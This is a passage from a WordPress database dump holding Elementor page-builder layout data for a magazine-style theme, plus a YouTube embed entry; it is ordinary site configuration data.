\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"sxv5g6k\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=qV8zMH-qeBc\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"choose_column\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1315,462,'_elementor_version','0.4'),(1316,462,'_elementor_css','a:3:{s:4:\"time\";i:1508895310;s:5:\"fonts\";a:1:{i:0;s:6:\"Tahoma\";}s:6:\"status\";s:4:\"file\";}'),(1318,360,'_oembed_50134ca05aad6c19f353cfb3d69ea8e4','<iframe width=\"1200\" height=\"675\" src=\"https://www.youtube.com/embed/qV8zMH-qeBc?feature=oembed\" frameborder=\"0\" gesture=\"media\" allowfullscreen></iframe>'),(1319,360,'_oembed_time_50134ca05aad6c19f353cfb3d69ea8e4','1508911603'),(1320,463,'_elementor_edit_mode','builder'),(1321,463,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\"